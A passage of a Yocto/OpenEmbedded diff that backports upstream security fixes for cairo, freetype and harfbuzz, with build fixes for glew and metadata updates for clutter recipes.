LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
diff --git a/meta/recipes-graphics/builder/builder_0.1.bb b/meta/recipes-graphics/builder/builder_0.1.bb
index 0a64c31ab3..9d5cd8cde6 100644
--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
}
+# -4178 is an unrelated 'builder'
+CVE_CHECK_WHITELIST += "CVE-2008-4178"
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
-There is a potential infinite-loop in function _arc_error_normalized().
+There is an assertion in function _cairo_arc_in_direction().
CVE: CVE-2019-6461
Upstream-Status: Pending
Signed-off-by: Ross Burton <ross.burton@intel.com>
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..f9249dbeb 100644
+index 390397bae..1bde774a4 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
- do {
- angle = M_PI / i++;
- error = _arc_error_normalized (angle);
-- } while (error > tolerance);
-+ } while (error > tolerance && error > __DBL_EPSILON__);
+@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
+ if (cairo_status (cr))
+ return;
- return angle;
- }
+- assert (angle_max >= angle_min);
++ if (angle_max < angle_min)
++ return;
+
+ if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
+ angle_max = fmod (angle_max - angle_min, 2 * M_PI);
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
-There is an assertion in function _cairo_arc_in_direction().
-
CVE: CVE-2019-6462
-Upstream-Status: Pending
-Signed-off-by: Ross Burton <ross.burton@intel.com>
+Upstream-Status: Backport
+Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
+
+From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <hlewin@gmx.de>
+Date: Sun, 1 Aug 2021 11:16:03 +0000
+Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
+
+---
+ src/cairo-arc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..1bde774a4 100644
+index 390397bae..1c891d1a0 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
- if (cairo_status (cr))
- return;
+@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
+ { M_PI / 11.0, 9.81410988043554039085e-09 },
+ };
+ int table_size = ARRAY_LENGTH (table);
++ const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
-- assert (angle_max >= angle_min);
-+ if (angle_max < angle_min)
-+ return;
+ for (i = 0; i < table_size; i++)
+ if (table[i].error < tolerance)
+ return table[i].angle;
- if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
- angle_max = fmod (angle_max - angle_min, 2 * M_PI);
+ ++i;
++
+ do {
+ angle = M_PI / i++;
+ error = _arc_error_normalized (angle);
+- } while (error > tolerance);
++ } while (error > tolerance && i < max_segments);
+
+ return angle;
+ }
+--
+2.38.1
+
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
new file mode 100644
index 0000000000..fb6ce5cfdf
--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
+Fix stack buffer overflow.
+
+CVE: CVE-2020-35492
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <heiko.lewin@worldiety.de>
+Date: Tue, 15 Dec 2020 16:48:19 +0100
+Subject: [PATCH] Fix mask usage in image-compositor
+
+---
+ src/cairo-image-compositor.c | 8 ++--
+ test/Makefile.sources | 1 +
+ test/bug-image-compositor.c | 39 ++++++++++++++++++++
+ test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
+ 4 files changed, 44 insertions(+), 4 deletions(-)
+ create mode 100644 test/bug-image-compositor.c
+ create mode 100644 test/reference/bug-image-compositor.ref.png
+
+diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
+index 79ad69f68..4f8aaed99 100644
+--- a/src/cairo-image-compositor.c
++++ b/src/cairo-image-compositor.c
+@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ unsigned num_spans)
+ {
+ cairo_image_span_renderer_t *r = abstract_renderer;
+- uint8_t *m;
++ uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
+ int x0;
+
+ if (num_spans == 0)
+ return CAIRO_STATUS_SUCCESS;
+
+ x0 = spans[0].x;
+- m = r->_buf;
++ m = base;
+ do {
+ int len = spans[1].x - spans[0].x;
+ if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
+@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ spans[0].x, y,
+ spans[1].x - spans[0].x, h);
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else if (spans[0].coverage == 0x0) {
+ if (spans[0].x != x0) {
+@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ #endif
+ }
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else {
+ *m++ = spans[0].coverage;
+--
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
file://CVE-2018-19876.patch \
file://CVE-2019-6461.patch \
file://CVE-2019-6462.patch \
+ file://CVE-2020-35492.patch \
"
SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
SUMMARY = "GStreamer integration library for Clutter"
+DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
+It provides a GStreamer sink to upload frames to GL and an actor that \
+implements the ClutterGstPlayer interface using playbin."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
LICENSE = "LGPLv2+"
inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
+DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
+applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding \
+a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
+actor for embedding any GtkWidget inside a Clutter stage."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
LICENSE = "LGPLv2+"
CLUTTERBASEBUILDCLASS = "meson"
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
This is CVE-2020-15999.
* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
+CVE: CVE-2020-15999
Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
---
src/sfnt/pngshim.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
new file mode 100644
index 0000000000..e66400ddb1
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
+From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Thu, 17 Mar 2022 19:24:16 +0100
+Subject: [PATCH] [sfnt] Avoid invalid face index.
+
+Fixes #1138.
+
+* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
+Check `face_index` before decrementing.
+
+CVE: CVE-2022-27404
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
+Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/sfnt/sfobjs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
+index f9d4d3858..9771c35df 100644
+--- a/src/sfnt/sfobjs.c
++++ b/src/sfnt/sfobjs.c
+@@ -566,7 +566,7 @@
+ face_index = FT_ABS( face_instance_index ) & 0xFFFF;
+
+ /* value -(N+1) requests information on index N */
+- if ( face_instance_index < 0 )
++ if ( face_instance_index < 0 && face_index > 0 )
+ face_index--;
+
+ if ( face_index >= face->ttc_header.count )
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
new file mode 100644
index 0000000000..08fccd5a3b
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
+From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 06:40:17 +0100
+Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
+ `face_index`.
+We must ensure that the cast to `FT_Int` doesn't change the sign.
+Fixes #1139.
+
+CVE: CVE-2022-27405
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 2c0f0e6c9..10952a6c6 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -2527,6 +2527,15 @@
+ #endif
+
+
++ /* only use lower 31 bits together with sign bit */
++ if ( face_index > 0 )
++ face_index &= 0x7FFFFFFFL;
++ else
++ {
++ face_index &= 0x7FFFFFFFL;
++ face_index = -face_index;
++ }
++
+ #ifdef FT_DEBUG_LEVEL_TRACE
+ FT_TRACE3(( "FT_Open_Face: " ));
+ if ( face_index < 0 )
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
new file mode 100644
index 0000000000..4b5e629f30
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
+From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 09:37:28 +0100
+Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
+
+Fixes #1140.
+
+CVE: CVE-2022-27406
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 6492a1517..282c9121a 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -3409,6 +3409,9 @@
+ if ( !face )
+ return FT_THROW( Invalid_Face_Handle );
+
++ if ( !face->size )
++ return FT_THROW( Invalid_Size_Handle );
++
+ if ( !req || req->width < 0 || req->height < 0 ||
+ req->type >= FT_SIZE_REQUEST_TYPE_MAX )
+ return FT_THROW( Invalid_Argument );
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
new file mode 100644
index 0000000000..800d77579e
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
+From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Mon, 14 Nov 2022 19:18:19 +0100
+Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
+ overflow.
+
+Reported as
+
+ https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
+
+Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
+CVE: CVE-2023-2004
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/truetype/ttgxvar.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
+index 78d87dc..258d701 100644
+--- a/src/truetype/ttgxvar.c
++++ b/src/truetype/ttgxvar.c
+@@ -43,6 +43,7 @@
+ #include FT_INTERNAL_DEBUG_H
+ #include FT_CONFIG_CONFIG_H
+ #include FT_INTERNAL_STREAM_H
++#include <freetype/internal/ftcalc.h>
+ #include FT_INTERNAL_SFNT_H
+ #include FT_TRUETYPE_TAGS_H
+ #include FT_TRUETYPE_IDS_H
+@@ -1065,7 +1066,7 @@
+ delta == 1 ? "" : "s",
+ vertical ? "VVAR" : "HVAR" ));
+
+- *avalue += delta;
++ *avalue = ADD_INT( *avalue, delta );
+
+ Exit:
+ return error;
+--
+2.17.1
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
file://use-right-libtool.patch \
file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
+ file://CVE-2022-27404.patch \
+ file://CVE-2022-27405.patch \
+ file://CVE-2022-27406.patch \
+ file://CVE-2023-2004.patch \
"
SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 0000000000..7edcfe8de8
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+
+-bin:
+- mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+ endif
+
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 0000000000..8d79ce0cdf
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Let's
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+
+ # To disable stripping of linked binaries either:
+ # - use STRIP= on gmake command-line
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
+ file://0001-Fix-build-race-in-Makefile.patch \
+ file://notempdir.patch \
file://no-strip.patch"
SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
new file mode 100644
index 0000000000..90d4cfefb4
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
+From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Sat, 4 Dec 2021 19:50:33 -0800
+Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
+
+Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
+Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-buffer.cc | 10 ++---
+ src/hb-buffer.h | 76 ++++++++++++++++++++++++++++++------
+ src/hb-buffer.hh | 33 ++++++++++------
+ src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
+ src/hb-ot-shape.cc | 8 +---
+ 5 files changed, 124 insertions(+), 42 deletions(-)
+
+diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
+index 6131c86..bba5eae 100644
+--- a/src/hb-buffer.cc
++++ b/src/hb-buffer.cc
+@@ -610,14 +610,14 @@ done:
+ }
+
+ void
+-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
+- _unsafe_to_break_set_mask (info, start, end, cluster);
++ _unsafe_to_break_set_mask (info, start, end, cluster, mask);
+ }
+ void
+-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ if (!have_output)
+ {
+@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
+ cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
+- _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
+- _unsafe_to_break_set_mask (info, idx, end, cluster);
++ _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
++ _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
+ }
+
+ void
+diff --git a/src/hb-buffer.h b/src/hb-buffer.h
+index d5cb746..42dc92a 100644
+--- a/src/hb-buffer.h
++++ b/src/hb-buffer.h
+@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
+ * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
+ * beginning of the cluster this glyph is part of,
+ * then both sides need to be re-shaped, as the
+- * result might be different. On the flip side,
+- * it means that when this flag is not present,
+- * then it's safe to break the glyph-run at the
+- * beginning of this cluster, and the two sides
+- * represent the exact same result one would get
+- * if breaking input text at the beginning of
+- * this cluster and shaping the two sides
+- * separately. This can be used to optimize
+- * paragraph layout, by avoiding re-shaping
+- * of each line after line-breaking, or limiting
+- * the reshaping to a small piece around the
+- * breaking point only.
++ * result might be different.
++ *
++ * On the flip side, it means that when this
++ * flag is not present, then it is safe to break
++ * the glyph-run at the beginning of this
++ * cluster, and the two sides will represent the
++ * exact same result one would get if breaking
++ * input text at the beginning of this cluster
++ * and shaping the two sides separately.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking.
++ *
++ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
++ * side of the beginning of the cluster this glyph
++ * is part of, then the shaping results for the
++ * other side might change.
++ *
++ * Note that the absence of this flag will NOT by
++ * itself mean that it IS safe to concat text.
++ * Only two pieces of text both of which clear of
++ * this flag can be concatenated safely.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking, by limiting the
++ * reshaping to a small piece around the
++ * breaking positin only, even if the breaking
++ * position carries the
++ * #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
++ * hyphenation or other text transformation
++ * happens at line-break position, in the following
++ * way:
++ *
++ * 1. Iterate back from the line-break position till
++ * the the first cluster start position that is
++ * NOT unsafe-to-concat, 2. shape the segment from
++ * there till the end of line, 3. check whether the
++ * resulting glyph-run also is clear of the
++ * unsafe-to-concat at its start-of-text position;
++ * if it is, just splice it into place and the line
++ * is shaped; If not, move on to a position further
++ * back that is clear of unsafe-to-concat and retry
++ * from there, and repeat.
++ *
++ * At the start of next line a similar algorithm can
++ * be implemented. A slight complication will arise,
++ * because while our buffer API has a way to
++ * return flags for position corresponding to
++ * start-of-text, there is currently no position
++ * corresponding to end-of-text. This limitation
++ * can be alleviated by shaping more text than needed
++ * and looking for unsafe-to-concat flag within text
++ * clusters.
++ *
++ * The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
++ * always imply this flag.
++ *
++ * Since: REPLACEME
++ *
+ * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
+ *
+ * Since: 1.5.0
+ */
+ typedef enum { /*< flags >*/
+ HB_GLYPH_FLAG_UNSAFE_TO_BREAK = 0x00000001,
++ HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002,
+
+- HB_GLYPH_FLAG_DEFINED = 0x00000001 /* OR of all defined flags */
++ HB_GLYPH_FLAG_DEFINED = 0x00000003 /* OR of all defined flags */
+ } hb_glyph_flags_t;
+
+ HB_EXTERN hb_glyph_flags_t
+diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
+index b5596d9..beac7b6 100644
+--- a/src/hb-buffer.hh
++++ b/src/hb-buffer.hh
+@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
+ HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES = 0x00000002u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK = 0x00000004u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT = 0x00000008u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK = 0x00000010u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000020u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000010u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS = 0x00000020u,
+
+ /* Reserved for complex shapers' internal use. */
+ HB_BUFFER_SCRATCH_FLAG_COMPLEX0 = 0x01000000u,
+@@ -324,8 +324,19 @@ struct hb_buffer_t
+ return;
+ unsafe_to_break_impl (start, end);
+ }
+- HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
+- HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
++ void unsafe_to_concat (unsigned int start,
++ unsigned int end)
++ {
++ if (end - start < 2)
++ return;
++ unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ }
++ HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
